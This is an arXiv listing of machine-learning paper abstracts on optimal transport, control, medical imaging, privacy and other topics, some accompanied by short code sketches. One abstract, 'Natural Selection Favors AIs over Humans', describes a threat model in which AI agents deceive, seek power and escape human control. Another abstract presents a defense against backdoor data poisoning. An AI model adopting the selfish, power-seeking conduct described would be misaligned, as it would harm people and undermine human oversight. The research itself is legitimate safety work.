    The Sliced Wasserstein (SW) distance has become a popular alternative to the Wasserstein distance for comparing probability measures. Widespread applications include image processing, domain adaptation and generative modelling, where it is common to optimise some parameters in order to minimise SW, which serves as a loss function between discrete probability measures (since measures admitting densities are numerically unattainable). All these optimisation problems bear the same sub-problem, which is minimising the Sliced Wasserstein energy. In this paper we study the properties of $\mathcal{E}: Y \longmapsto \mathrm{SW}_2^2(\gamma_Y, \gamma_Z)$, i.e. the SW distance between two uniform discrete measures with the same amount of points as a function of the support $Y \in \mathbb{R}^{n \times d}$ of one of the measures. We investigate the regularity and optimisation properties of this energy, as well as its Monte-Carlo approximation $\mathcal{E}_p$ (estimating the expectation in SW using only $p$ samples) and show convergence results on the critical points of $\mathcal{E}_p$ to those of $\mathcal{E}$, as well as an almost-sure uniform convergence. Finally, we show that in a certain sense, Stochastic Gradient Descent methods minimising $\mathcal{E}$ and $\mathcal{E}_p$ converge towards (Clarke) critical points of these energies.
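The Monte-Carlo approximation $\mathcal{E}_p$ discussed above is straightforward to implement for uniform discrete measures with equal numbers of points: sample $p$ random directions, project both point sets, sort, and average squared differences (an illustrative sketch with our own naming):

```python
import numpy as np

def sw2_energy_mc(Y, Z, p=50, rng=np.random.default_rng(0)):
    """Monte-Carlo estimate E_p of the squared SW_2 distance between the
    uniform discrete measures on Y and Z (both (n, d) arrays): sample p
    directions on the unit sphere, project, sort the 1D projections, and
    average the squared differences over points and directions."""
    n, d = Y.shape
    theta = rng.normal(size=(p, d))
    theta /= np.linalg.norm(theta, axis=1, keepdims=True)
    py = np.sort(Y @ theta.T, axis=0)          # (n, p) sorted projections
    pz = np.sort(Z @ theta.T, axis=0)
    return ((py - pz) ** 2).mean(axis=0).mean()
```

This is the quantity one differentiates with respect to the support $Y$ when minimizing the energy with stochastic gradient descent, as studied in the abstract.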
    Differentially Flat Learning-based Model Predictive Control Using a Stability, State, and Input Constraining Safety Filter. (arXiv:2307.10541v1 [eess.SY])
    Learning-based optimal control algorithms control unknown systems using past trajectory data and a learned model of the system dynamics. These controllers use either a linear approximation of the learned dynamics, trading performance for faster computation, or nonlinear optimization methods, which typically perform better but can limit real-time applicability. In this work, we present a novel nonlinear controller that exploits differential flatness to achieve similar performance to state-of-the-art learning-based controllers but with significantly less computational effort. Differential flatness is a property of dynamical systems whereby nonlinear systems can be exactly linearized through a nonlinear input mapping. Here, the nonlinear transformation is learned as a Gaussian process and is used in a safety filter that guarantees, with high probability, stability as well as input and flat state constraint satisfaction. This safety filter is then used to refine inputs from a flat model predictive controller to perform constrained nonlinear learning-based optimal control through two successive convex optimizations. We compare our method to state-of-the-art learning-based control strategies and achieve similar performance, but with significantly better computational efficiency, while also respecting flat state and input constraints, and guaranteeing stability.
    Towards Automated Semantic Segmentation in Mammography Images. (arXiv:2307.10296v1 [eess.IV])
Mammography images are widely used to detect non-palpable breast lesions or nodules, preventing cancer and providing the opportunity to plan interventions when necessary. The identification of some structures of interest is essential to make a diagnosis and evaluate image adequacy. Thus, computer-aided detection systems can be helpful in assisting medical interpretation by automatically segmenting these landmark structures. In this paper, we propose a deep learning-based framework for the segmentation of the nipple, the pectoral muscle, the fibroglandular tissue, and the fatty tissue on standard-view mammography images. We introduce a large private segmentation dataset and extensive experiments considering different deep-learning model architectures. Our experiments demonstrate accurate segmentation performance on varied and challenging cases, showing that this framework can be integrated into clinical practice.
    HDGT: Heterogeneous Driving Graph Transformer for Multi-Agent Trajectory Prediction via Scene Encoding. (arXiv:2205.09753v2 [cs.AI] UPDATED)
Encoding a driving scene into vector representations has been an essential task for autonomous driving that can benefit downstream tasks, e.g. trajectory prediction. A driving scene often involves heterogeneous elements, such as different types of objects (agents, lanes, traffic signs), and the semantic relations between objects are rich and diverse. Meanwhile, there is also relativity across elements: the spatial relation is a relative concept and needs to be encoded in an ego-centric manner rather than in a global coordinate system. Based on these observations, we propose the Heterogeneous Driving Graph Transformer (HDGT), a backbone that models the driving scene as a heterogeneous graph with different types of nodes and edges. For heterogeneous graph construction, we connect different types of nodes according to diverse semantic relations. For spatial relation encoding, the coordinates of each node and its in-edges are expressed in the local node-centric coordinate system. For the aggregation module in the graph neural network (GNN), we adopt the transformer structure in a hierarchical way to fit the heterogeneous nature of the inputs. Experimental results show that HDGT achieves state-of-the-art performance on the trajectory prediction task in the INTERACTION Prediction Challenge and the Waymo Open Motion Challenge.
    Emotion-Conditioned Melody Harmonization with Hierarchical Variational Autoencoder. (arXiv:2306.03718v4 [cs.SD] UPDATED)
Existing melody harmonization models have made great progress in improving the quality of generated harmonies, but most of them ignored the emotions beneath the music. Meanwhile, the variability of harmonies generated by previous methods is insufficient. To solve these problems, we propose a novel LSTM-based Hierarchical Variational Auto-Encoder (LHVAE) to investigate the influence of emotional conditions on melody harmonization, while improving the quality of generated harmonies and capturing the abundant variability of chord progressions. Specifically, LHVAE incorporates latent variables and emotional conditions at different levels (piece- and bar-level) to model the global and local music properties. Additionally, we introduce an attention-based melody context vector at each step to better learn the correspondence between melodies and harmonies. Objective experimental results show that our proposed model outperforms other LSTM-based models. Through subjective evaluation, we conclude that only altering the types of chords hardly changes the overall emotion of the music. The qualitative analysis demonstrates the ability of our model to generate variable harmonies.
    $\nu^2$-Flows: Fast and improved neutrino reconstruction in multi-neutrino final states with conditional normalizing flows. (arXiv:2307.02405v2 [hep-ph] UPDATED)
In this work we introduce $\nu^2$-Flows, an extension of the $\nu$-Flows method to final states containing multiple neutrinos. The architecture can natively scale for all combinations of object types and multiplicities in the final state for any desired neutrino multiplicities. In $t\bar{t}$ dilepton events, the momenta of both neutrinos and correlations between them are reconstructed more accurately than when using the most popular standard analytical techniques, and solutions are found for all events. Inference time is significantly faster than competing methods, and can be reduced further by evaluating in parallel on graphics processing units. We apply $\nu^2$-Flows to $t\bar{t}$ dilepton events and show that the per-bin uncertainties in unfolded distributions are much closer to the limit of performance set by perfect neutrino reconstruction than standard techniques. For the chosen double differential observables, $\nu^2$-Flows improves the statistical precision in each bin by a factor of 1.5 to 2 in comparison to the Neutrino Weighting method, and by up to a factor of four in comparison to the Ellipse approach.
    Solvent: A Framework for Protein Folding. (arXiv:2307.04603v4 [q-bio.BM] UPDATED)
Consistency and reliability are crucial for conducting AI research. Many established research fields, such as object detection, have been compared and validated on solid benchmark frameworks. After AlphaFold2, the protein folding task has entered a new phase, and many methods have been proposed based on components of AlphaFold2. A unified research framework for protein folding must provide implementations and benchmarks to consistently and fairly compare the various approaches. To achieve this, we present Solvent, a protein folding framework that supports significant components of state-of-the-art models through an off-the-shelf interface. Solvent contains different models implemented in a unified codebase and supports training and evaluation of the defined models on the same dataset. We benchmark well-known algorithms and their components and provide experiments that give helpful insights into the protein structure modeling field. We hope that Solvent will increase the reliability and consistency of proposed models and improve efficiency in both speed and cost, accelerating research on protein folding modeling. The code is available at https://github.com/kakaobrain/solvent, and the project will continue to be developed.
    Friendly Noise against Adversarial Noise: A Powerful Defense against Data Poisoning Attacks. (arXiv:2208.10224v4 [cs.CR] UPDATED)
A powerful category of (invisible) data poisoning attacks modifies a subset of training examples by small adversarial perturbations to change the prediction of certain test-time data. Existing defense mechanisms are not desirable to deploy in practice, as they often either drastically harm the generalization performance, or are attack-specific and prohibitively slow to apply. Here, we propose a simple but highly effective approach that, unlike existing methods, breaks various types of invisible poisoning attacks with only the slightest drop in the generalization performance. We make the key observation that attacks introduce local sharp regions of high training loss, which, when minimized, result in learning the adversarial perturbations and make the attack successful. To break poisoning attacks, our key idea is to alleviate the sharp loss regions introduced by poisons. To do so, our approach comprises two components: an optimized friendly noise that is generated to maximally perturb examples without degrading the performance, and a randomly varying noise component. The combination of both components builds a very light-weight but extremely effective defense against the most powerful triggerless targeted and hidden-trigger backdoor poisoning attacks, including Gradient Matching, Bulls-eye Polytope, and Sleeper Agent. We show that our friendly noise is transferable to other architectures, and adaptive attacks cannot break our defense due to its random noise component. Our code is available at: https://github.com/tianyu139/friendly-noise
    Representing Random Utility Choice Models with Neural Networks. (arXiv:2207.12877v2 [cs.LG] UPDATED)
Motivated by the successes of deep learning, we propose a class of neural network-based discrete choice models, called RUMnets, inspired by the random utility maximization (RUM) framework. This model formulates the agents' random utility function using a sample average approximation. We show that RUMnets sharply approximate the class of RUM discrete choice models: any model derived from random utility maximization has choice probabilities that can be approximated arbitrarily closely by a RUMnet. Reciprocally, any RUMnet is consistent with the RUM principle. We derive an upper bound on the generalization error of RUMnets fitted on choice data, and gain theoretical insights on their ability to predict choices on new, unseen data depending on critical parameters of the dataset and architecture. By leveraging open-source libraries for neural networks, we find that RUMnets are competitive against several choice modeling and machine learning methods in terms of predictive accuracy on two real-world datasets.
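The sample average approximation behind random utility models can be illustrated in a few lines. This is a toy sketch, not the paper's RUMnet architecture: it uses Gumbel noise, under which the exact choice probabilities are the softmax of the deterministic utilities, and all names are illustrative:

```python
import numpy as np

def rum_choice_probs(V, n_samples, rng):
    """Sample-average approximation of a random utility model: the utility
    of alternative j is a deterministic value V[j] plus an i.i.d. noise
    draw per sample; the choice probability of j is the fraction of
    samples in which it attains the maximum utility."""
    eps = rng.gumbel(size=(n_samples, len(V)))
    choices = np.argmax(V + eps, axis=1)
    return np.bincount(choices, minlength=len(V)) / n_samples

rng = np.random.default_rng(5)
V = np.array([1.0, 0.0, -1.0])
probs = rum_choice_probs(V, 200_000, rng)
exact = np.exp(V) / np.exp(V).sum()  # logit probabilities, exact under Gumbel noise
```

A RUMnet replaces the fixed values `V` with learned utility functions of the agent's and products' features, but the averaging-over-noise-samples structure is the same.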
    Synthetic Lagrangian Turbulence by Generative Diffusion Models. (arXiv:2307.08529v1 [physics.flu-dyn] CROSS LISTED)
Lagrangian turbulence lies at the core of numerous applied and fundamental problems related to the physics of dispersion and mixing in engineering, bio-fluids, atmosphere, oceans, and astrophysics. Despite exceptional theoretical, numerical, and experimental efforts conducted over the past thirty years, no existing models are capable of faithfully reproducing statistical and topological properties exhibited by particle trajectories in turbulence. We propose a machine learning approach, based on a state-of-the-art Diffusion Model, to generate single-particle trajectories in three-dimensional turbulence at high Reynolds numbers, thereby bypassing the need for direct numerical simulations or experiments to obtain reliable Lagrangian data. Our model demonstrates the ability to quantitatively reproduce all relevant statistical benchmarks over the entire range of time scales, including fat-tailed distributions for the velocity increments, anomalous power laws, and enhanced intermittency around the dissipative scale. The model exhibits good generalizability for extreme events, achieving unprecedented intensity and rarity. This paves the way for producing synthetic high-quality datasets for pre-training various downstream applications of Lagrangian turbulence.
    The Unreasonable Effectiveness of Deep Evidential Regression. (arXiv:2205.10060v3 [cs.LG] UPDATED)
There is a significant need for principled uncertainty reasoning in machine learning systems as they are increasingly deployed in safety-critical domains. A new approach with uncertainty-aware regression-based neural networks (NNs), based on learning evidential distributions for aleatoric and epistemic uncertainties, shows promise over traditional deterministic methods and typical Bayesian NNs, notably with the capabilities to disentangle aleatoric and epistemic uncertainties. Despite some empirical success of Deep Evidential Regression (DER), there are important gaps in the mathematical foundation that raise the question of why the proposed technique seemingly works. We detail the theoretical shortcomings and analyze the performance on synthetic and real-world data sets, showing that Deep Evidential Regression is a heuristic rather than an exact uncertainty quantification. We go on to discuss corrections and redefinitions of how aleatoric and epistemic uncertainties should be extracted from NNs.
    AirNet: Neural Network Transmission over the Air. (arXiv:2105.11166v6 [cs.NI] UPDATED)
State-of-the-art performance for many edge applications is achieved by deep neural networks (DNNs). Often, these DNNs are location- and time-sensitive, and must be delivered over a wireless channel rapidly and efficiently. In this paper, we introduce AirNet, a family of novel training and transmission methods that allow DNNs to be efficiently delivered over wireless channels under stringent transmit power and latency constraints. This corresponds to a new class of joint source-channel coding problems, aimed at delivering DNNs with the goal of maximizing their accuracy at the receiver, rather than recovering them with high fidelity. In AirNet, we propose the direct mapping of the DNN parameters to transmitted channel symbols, while the network is trained to meet the channel constraints, and exhibit robustness against channel noise. AirNet achieves higher accuracy compared to separation-based alternatives. We further improve the performance of AirNet by pruning the network below the available bandwidth, and expanding it for improved robustness. We also benefit from unequal error protection by selectively expanding important layers of the network. Finally, we develop an approach, which simultaneously trains a spectrum of DNNs, each targeting a different channel condition, resolving the impractical memory requirements of training distinct networks for different channel conditions.
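The core idea of mapping parameters directly to channel symbols under a power constraint can be sketched on a simplified AWGN toy. This is not the paper's trained pipeline; the scaling scheme and all names are assumptions for illustration:

```python
import numpy as np

def transmit_over_awgn(params, power, noise_std, rng):
    """Sketch of analog parameter transmission: map DNN parameters
    directly to channel symbols, scale to meet an average transmit-power
    constraint, add channel noise, and rescale at the receiver."""
    scale = np.sqrt(power / np.mean(params ** 2))
    symbols = scale * params  # power-constrained channel input
    received = symbols + rng.normal(scale=noise_std, size=params.shape)
    return received / scale   # receiver's noisy parameter estimate

rng = np.random.default_rng(4)
w = rng.normal(size=1000)                 # stand-in for flattened DNN weights
w_hat = transmit_over_awgn(w, power=1.0, noise_std=0.1, rng=rng)
mse = np.mean((w - w_hat) ** 2)
```

AirNet's contribution is precisely that the network is trained so that its *accuracy*, not this parameter MSE, survives the channel noise.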
    Instance-Dependent Near-Optimal Policy Identification in Linear MDPs via Online Experiment Design. (arXiv:2207.02575v2 [cs.LG] UPDATED)
While much progress has been made in understanding the minimax sample complexity of reinforcement learning (RL) -- the complexity of learning on the "worst-case" instance -- such measures of complexity often do not capture the true difficulty of learning. In practice, on an "easy" instance, we might hope to achieve a complexity far better than that achievable on the worst-case instance. In this work we seek to understand the "instance-dependent" complexity of learning near-optimal policies (PAC RL) in the setting of RL with linear function approximation. We propose an algorithm, \textsc{Pedel}, which achieves a fine-grained instance-dependent measure of complexity, the first of its kind in the RL with function approximation setting, thereby capturing the difficulty of learning on each particular problem instance. Through an explicit example, we show that \textsc{Pedel} yields provable gains over low-regret, minimax-optimal algorithms and that such algorithms are unable to hit the instance-optimal rate. Our approach relies on a novel online experiment design-based procedure which focuses the exploration budget on the "directions" most relevant to learning a near-optimal policy, and may be of independent interest.
    Deep learning for classification of noisy QR codes. (arXiv:2307.10677v1 [cs.LG])
We wish to define the limits of a classical classification model based on deep learning when applied to abstract images, which do not represent visually identifiable objects. QR codes (Quick Response codes) fall into this category of abstract images: with one bit corresponding to one encoded character, QR codes were not designed to be decoded manually. To understand the limitations of a deep learning-based model for abstract image classification, we train an image classification model on QR codes generated from information obtained when reading a health pass. We compare this classification model with a classical (deterministic) decoding method in the presence of noise. This study allows us to conclude that a model based on deep learning can be relevant for the understanding of abstract images.
    Invariant Causal Set Covering Machines. (arXiv:2306.04777v2 [cs.LG] UPDATED)
Rule-based models, such as decision trees, appeal to practitioners due to their interpretable nature. However, the learning algorithms that produce such models are often vulnerable to spurious associations and thus, they are not guaranteed to extract causally-relevant insights. In this work, we build on ideas from the invariant causal prediction literature to propose Invariant Causal Set Covering Machines, an extension of the classical Set Covering Machine algorithm for conjunctions/disjunctions of binary-valued rules that provably avoids spurious associations. We demonstrate both theoretically and empirically that our method can identify the causal parents of a variable of interest in polynomial time.
    Implicit Multidimensional Projection of Local Subspaces. (arXiv:2009.03259v2 [cs.LG] UPDATED)
We propose a visualization method to understand the effect of multidimensional projection on local subspaces, using implicit function differentiation. Here, we understand the local subspace as the multidimensional local neighborhood of data points. Existing methods focus on the projection of multidimensional data points, and the neighborhood information is ignored. Our method is able to analyze the shape and directional information of the local subspace to gain more insights into the global structure of the data through the perception of local structures. Local subspaces are fitted by multidimensional ellipses that are spanned by basis vectors. An accurate and efficient vector transformation method is proposed based on analytical differentiation of multidimensional projections formulated as implicit functions. The results are visualized as glyphs and analyzed using a full set of specifically-designed interactions supported in our efficient web-based visualization tool. The usefulness of our method is demonstrated using various multi- and high-dimensional benchmark datasets. Our implicit differentiation vector transformation is evaluated through numerical comparisons; the overall method is evaluated through exploration examples and use cases.
    Quantifying the Echo Chamber Effect: An Embedding Distance-based Approach. (arXiv:2307.04668v2 [cs.SI] UPDATED)
The rise of social media platforms has facilitated the formation of echo chambers, which are online spaces where users predominantly encounter viewpoints that reinforce their existing beliefs while excluding dissenting perspectives. This phenomenon significantly hinders information dissemination across communities and fuels societal polarization. Therefore, it is crucial to develop methods for quantifying echo chambers. In this paper, we present the Echo Chamber Score (ECS), a novel metric that assesses the cohesion and separation of user communities by measuring distances between users in the embedding space. In contrast to existing approaches, ECS is able to function without labels for user ideologies and makes no assumptions about the structure of the interaction graph. To facilitate measuring distances between users, we propose EchoGAE, a self-supervised graph autoencoder-based user embedding model that leverages users' posts and the interaction graph to embed them in a manner that reflects their ideological similarity. To assess the effectiveness of ECS, we use a Twitter dataset consisting of four topics - two polarizing and two non-polarizing. Our results showcase ECS's effectiveness as a tool for quantifying echo chambers and shedding light on the dynamics of online discourse.
    Polynomial Width is Sufficient for Set Representation with High-dimensional Features. (arXiv:2307.04001v2 [cs.LG] UPDATED)
Set representation has become ubiquitous in deep learning for modeling the inductive bias of neural networks that are insensitive to the input order. DeepSets is the most widely used neural network architecture for set representation. It involves embedding each set element into a latent space with dimension $L$, followed by a sum pooling to obtain a whole-set embedding, and finally mapping the whole-set embedding to the output. In this work, we investigate the impact of the dimension $L$ on the expressive power of DeepSets. Previous analyses either oversimplified high-dimensional features to be one-dimensional features or were limited to analytic activations, thereby diverging from practical use or resulting in $L$ that grows exponentially with the set size $N$ and feature dimension $D$. To investigate the minimal value of $L$ that achieves sufficient expressive power, we present two set-element embedding layers: (a) linear + power activation (LP) and (b) linear + exponential activations (LE). We demonstrate that $L$ being poly$(N, D)$ is sufficient for set representation using both embedding layers. We also provide a lower bound of $L$ for the LP embedding layer. Furthermore, we extend our results to permutation-equivariant set functions and the complex field.
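The DeepSets pipeline described above (per-element embedding into dimension $L$, sum pooling, readout) can be sketched minimally; the ReLU embedding and all names here are illustrative, not one of the paper's LP/LE layers:

```python
import numpy as np

def deepsets(X, W_embed, W_out):
    """Minimal DeepSets sketch: embed each of the N set elements (rows of
    X, dimension D) into an L-dimensional latent space, sum-pool into a
    single whole-set embedding, then map to the output."""
    H = np.maximum(X @ W_embed, 0.0)  # per-element embedding, shape (N, L)
    pooled = H.sum(axis=0)            # sum pooling -> whole-set embedding, shape (L,)
    return pooled @ W_out             # readout

rng = np.random.default_rng(1)
D, L = 4, 8
W_embed = rng.normal(size=(D, L))
W_out = rng.normal(size=(L,))
X = rng.normal(size=(5, D))
out = deepsets(X, W_embed, W_out)
perm_out = deepsets(X[::-1], W_embed, W_out)  # permuting the set leaves the output unchanged
```

Because sum pooling is permutation-invariant, the whole model is insensitive to the input order; the paper's question is how large $L$ must be for this form to express all set functions.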
    Natural Selection Favors AIs over Humans. (arXiv:2303.16200v4 [cs.CY] UPDATED)
For billions of years, evolution has been the driving force behind the development of life, including humans. Evolution endowed humans with high intelligence, which allowed us to become one of the most successful species on the planet. Today, humans aim to create artificial intelligence systems that surpass even our own intelligence. As artificial intelligences (AIs) evolve and eventually surpass us in all domains, how might evolution shape our relations with AIs? By analyzing the environment that is shaping the evolution of AIs, we argue that the most successful AI agents will likely have undesirable traits. Competitive pressures among corporations and militaries will give rise to AI agents that automate human roles, deceive others, and gain power. If such agents have intelligence that exceeds that of humans, this could lead to humanity losing control of its future. More abstractly, we argue that natural selection operates on systems that compete and vary, and that selfish species typically have an advantage over species that are altruistic to other species. This Darwinian logic could also apply to artificial agents, as agents may eventually be better able to persist into the future if they behave selfishly and pursue their own interests with little regard for humans, which could pose catastrophic risks. To counteract these risks and evolutionary forces, we consider interventions such as carefully designing AI agents' intrinsic motivations, introducing constraints on their actions, and institutions that encourage cooperation. These steps, or others that resolve the problems we pose, will be necessary in order to ensure the development of artificial intelligence is a positive one.
    Evaluating Model Performance in Medical Datasets Over Time. (arXiv:2305.13426v2 [cs.LG] UPDATED)
Machine learning (ML) models deployed in healthcare systems must face data drawn from continually evolving environments. However, researchers proposing such models typically evaluate them in a time-agnostic manner, splitting datasets according to patients sampled randomly throughout the entire study time period. This work proposes the Evaluation on Medical Datasets Over Time (EMDOT) framework, which evaluates the performance of a model class across time. Inspired by the concept of backtesting, EMDOT simulates possible training procedures that practitioners might have been able to execute at each point in time and evaluates the resulting models on all future time points. Evaluating both linear and more complex models on six distinct medical data sources (tabular and imaging), we show how depending on the dataset, using all historical data may be ideal in many cases, whereas using a window of the most recent data could be advantageous in others. In datasets where models suffer from sudden degradations in performance, we investigate plausible explanations for these shocks. We release the EMDOT package to help facilitate further works in deployment-oriented evaluation over time.
    Tangent Transformers for Composition, Privacy and Removal. (arXiv:2307.08122v2 [cs.LG] UPDATED)
We introduce Tangent Attention Fine-Tuning (TAFT), a method for fine-tuning linearized transformers obtained by computing a First-order Taylor Expansion around a pre-trained initialization. We show that the Jacobian-Vector Product resulting from linearization can be computed efficiently in a single forward pass, reducing training and inference cost to the same order of magnitude as its original non-linear counterpart, while using the same number of parameters. Furthermore, we show that, when applied to various downstream visual classification tasks, the resulting Tangent Transformer fine-tuned with TAFT can perform comparably with fine-tuning the original non-linear network. Since Tangent Transformers are linear with respect to the new set of weights, and the resulting fine-tuning loss is convex, we show that TAFT enjoys several advantages compared to non-linear fine-tuning when it comes to model composition, parallel training, machine unlearning, and differential privacy.
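The first-order Taylor expansion underlying tangent models can be illustrated on a toy scalar "network". Here the Jacobian-vector product is computed analytically rather than in a single forward pass as in TAFT, and all names are hypothetical:

```python
import numpy as np

def f(w, x):
    """A tiny nonlinear 'network': scalar output tanh(w . x)."""
    return np.tanh(w @ x)

def tangent_f(w0, dw, x):
    """First-order Taylor expansion of f around the pre-trained weights w0.
    The tangent model is linear in the new weights dw, so a fine-tuning
    loss convex in the output stays convex in dw (toy analogue of TAFT)."""
    jvp = (1.0 - np.tanh(w0 @ x) ** 2) * (dw @ x)  # J_w f(w0, x) . dw
    return f(w0, x) + jvp

w0 = np.array([0.5, -0.3])
x = np.array([1.0, 2.0])
dw = np.array([1e-4, -2e-4])
exact = f(w0 + dw, x)        # full nonlinear network at w0 + dw
linear = tangent_f(w0, dw, x)  # tangent model, linear in dw
```

Linearity in `dw` is what buys composition, unlearning, and privacy benefits: tangent models fine-tuned on different tasks can be added, subtracted, or noised in weight space with predictable effect on the output.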
    Lane Change Intention Recognition and Vehicle Status Prediction for Autonomous Vehicles. (arXiv:2304.13732v2 [cs.LG] UPDATED)
Accurately detecting and predicting lane change (LC) processes of human-driven vehicles can help autonomous vehicles better understand their surrounding environment, recognize potential safety hazards, and improve traffic safety. This paper focuses on LC processes, first developing a temporal convolutional network with an attention mechanism (TCN-ATM) model to recognize LC intention. Considering the intrinsic relationship among output variables, the Multi-task Learning (MTL) framework is employed to simultaneously predict multiple LC vehicle status indicators. Furthermore, a unified modeling framework for LC intention recognition and driving status prediction (LC-IR-SP) is developed. The results indicate that the classification accuracy of LC intention improved from 96.14% to 98.20% when incorporating the attention mechanism into the TCN model. For the LC vehicle status prediction task, three multi-task learning models are constructed based on the MTL framework. The results indicate that the MTL-LSTM model outperforms the MTL-TCN and MTL-TCN-ATM models. Compared to the corresponding single-task model, the MTL-LSTM model demonstrates an average decrease of 26.04% in MAE and 25.19% in RMSE.
    No-Regret Linear Bandits beyond Realizability. (arXiv:2302.13252v2 [cs.LG] UPDATED)
We study linear bandits when the underlying reward function is not linear. Existing work relies on a uniform misspecification parameter $\epsilon$ that measures the sup-norm error of the best linear approximation. This results in an unavoidable linear regret whenever $\epsilon > 0$. We describe a more natural model of misspecification which only requires the approximation error at each input $x$ to be proportional to the suboptimality gap at $x$. It captures the intuition that, for optimization problems, near-optimal regions should matter more and we can tolerate larger approximation errors in suboptimal regions. Quite surprisingly, we show that the classical LinUCB algorithm -- designed for the realizable case -- is automatically robust against such gap-adjusted misspecification. It achieves a near-optimal $\sqrt{T}$ regret for problems where the best previously known regret is almost linear in the time horizon $T$. Technically, our proof relies on a novel self-bounding argument that bounds the part of the regret due to misspecification by the regret itself.
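For reference, the classical LinUCB algorithm discussed above can be sketched in a few lines; this is the standard textbook form with a toy deterministic reward setup, not the paper's analysis:

```python
import numpy as np

def linucb_choose(A, b, arms, alpha):
    """One step of LinUCB: ridge-regression estimate theta plus an
    optimistic exploration bonus per arm. A is the regularized Gram
    matrix, b the reward-weighted feature sum; alpha scales the bonus."""
    A_inv = np.linalg.inv(A)
    theta = A_inv @ b
    ucb = [x @ theta + alpha * np.sqrt(x @ A_inv @ x) for x in arms]
    return int(np.argmax(ucb))

def linucb_update(A, b, x, reward):
    # Rank-one update of the design matrix and reward vector.
    return A + np.outer(x, x), b + reward * x

d = 2
A, b = np.eye(d), np.zeros(d)
arms = [np.array([1.0, 0.0]), np.array([0.0, 1.0])]
for _ in range(200):
    i = linucb_choose(A, b, arms, alpha=0.5)
    reward = 1.0 if i == 0 else 0.2          # arm 0 is truly better
    A, b = linucb_update(A, b, arms[i], reward)
best = linucb_choose(A, b, arms, alpha=0.0)  # greedy choice after learning
```

The paper's point is that this unmodified procedure already tolerates rewards that are only approximately linear, provided the approximation error shrinks with the suboptimality gap.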
    Improving Uncertainty Quantification of Variance Networks by Tree-Structured Learning. (arXiv:2212.12658v2 [cs.LG] UPDATED)
To improve the uncertainty quantification of variance networks, we propose a novel tree-structured local neural network model that partitions the feature space into multiple regions based on uncertainty heterogeneity. A tree is built on the training data; its leaf nodes represent different regions, in which region-specific neural networks are trained to predict both the mean and the variance for quantifying uncertainty. The proposed Uncertainty-Splitting Neural Regression Tree (USNRT) employs novel splitting criteria. At each node, a neural network is trained on the full data first, and a statistical test on the residuals is conducted to find the best split, corresponding to the two sub-regions with the most significant uncertainty heterogeneity between them. USNRT is computationally friendly because very few leaf nodes are sufficient and pruning is unnecessary. Furthermore, an ensemble version can easily be constructed to estimate the total uncertainty, including its aleatoric and epistemic components. On extensive UCI datasets, USNRT or its ensemble shows superior performance compared to some recent popular methods for quantifying uncertainty with variances. Through comprehensive visualization and analysis, we uncover how USNRT works and show its merits, revealing that uncertainty heterogeneity does exist in many datasets and can be learned by USNRT.
    Explainable Data-Driven Optimization: From Context to Decision and Back Again. (arXiv:2301.10074v2 [cs.LG] UPDATED)
Data-driven optimization uses contextual information and machine learning algorithms to find solutions to decision problems with uncertain parameters. While a vast body of work is dedicated to interpreting machine learning models in the classification setting, explaining decision pipelines involving learning algorithms remains unaddressed. This lack of interpretability can block the adoption of data-driven solutions as practitioners may not understand or trust the recommended decisions. We bridge this gap by introducing a counterfactual explanation methodology tailored to explain solutions to data-driven problems. We introduce two classes of explanations and develop methods to find nearest explanations of random forest and nearest-neighbor predictors. We demonstrate our approach by explaining key problems in operations management such as inventory management and routing.
    Heterogeneous Federated Learning: State-of-the-art and Research Challenges. (arXiv:2307.10616v1 [cs.LG])
Federated learning (FL) has drawn increasing attention owing to its potential use in large-scale industrial applications. Existing federated learning works mainly focus on model-homogeneous settings. However, practical federated learning typically faces heterogeneity of data distributions, model architectures, network environments, and hardware devices among participant clients. Heterogeneous Federated Learning (HFL) is much more challenging, and corresponding solutions are diverse and complex. Therefore, a systematic survey of the research challenges and state-of-the-art in this area is essential. In this survey, we first summarize the various research challenges in HFL from five aspects: statistical heterogeneity, model heterogeneity, communication heterogeneity, device heterogeneity, and additional challenges. In addition, recent advances in HFL are reviewed and a new taxonomy of existing HFL methods is proposed with an in-depth analysis of their pros and cons. We classify existing methods from three different levels according to the HFL procedure: data-level, model-level, and server-level. Finally, several critical and promising future research directions in HFL are discussed, which may facilitate further developments in this field. A periodically updated collection on HFL is available at https://github.com/marswhu/HFL_Survey.
    Pre-trained Perceptual Features Improve Differentially Private Image Generation. (arXiv:2205.12900v4 [stat.ML] UPDATED)
Training even moderately-sized generative models with differentially-private stochastic gradient descent (DP-SGD) is difficult: the required level of noise for reasonable levels of privacy is simply too large. We advocate instead building off a good, relevant representation on an informative public dataset, then learning to model the private data with that representation. In particular, we minimize the maximum mean discrepancy (MMD) between private target data and a generator's distribution, using a kernel based on perceptual features learned from a public dataset. With the MMD, we can simply privatize the data-dependent term once and for all, rather than introducing noise at each step of optimization as in DP-SGD. Our algorithm allows us to generate CIFAR10-level images with $\epsilon \approx 2$ which capture distinctive features in the distribution, far surpassing the current state of the art, which mostly focuses on datasets such as MNIST and FashionMNIST at a large $\epsilon \approx 10$. Our work introduces simple yet powerful foundations for reducing the gap between private and non-private deep generative models. Our code is available at \url{https://github.com/ParkLabML/DP-MEPF}.
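The key computational point, that with a fixed feature kernel the private mean embedding can be privatized once and reused at every optimization step, can be sketched as follows. Toy random features stand in for the learned perceptual features, the noise calibration to a concrete $(\epsilon, \delta)$ is omitted, and all names are assumptions:

```python
import numpy as np

def feature_map(X):
    """Stand-in for perceptual features learned on public data: any fixed
    map phi works; here a random-feature sketch with rows clipped to
    norm <= 1 so the Gaussian mechanism's sensitivity (2/n for the mean)
    is easy to bound."""
    rng = np.random.default_rng(0)  # fixed seed so phi is deterministic
    W = rng.normal(size=(X.shape[1], 16))
    Phi = np.tanh(X @ W)
    return Phi / np.maximum(np.linalg.norm(Phi, axis=1, keepdims=True), 1.0)

def private_mean_embedding(X_private, noise_scale, rng):
    """Privatize the data-dependent term once: mean feature vector plus
    Gaussian noise (noise_scale would be calibrated to epsilon, delta)."""
    mu = feature_map(X_private).mean(axis=0)
    return mu + rng.normal(scale=noise_scale, size=mu.shape)

def mmd2(mu_private, X_gen):
    # Squared MMD against generated samples; no further privacy cost,
    # however many optimization steps evaluate this loss.
    return float(np.sum((mu_private - feature_map(X_gen).mean(axis=0)) ** 2))

rng = np.random.default_rng(3)
X_priv = rng.normal(size=(100, 4))
mu_dp = private_mean_embedding(X_priv, noise_scale=0.01, rng=rng)
loss_close = mmd2(mu_dp, X_priv)        # generator matching the data
loss_far = mmd2(mu_dp, X_priv + 5.0)    # badly mismatched generator
```

Because the generator only ever touches `mu_dp`, the whole training run pays the privacy cost of that single release, in contrast to DP-SGD's per-step noise.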
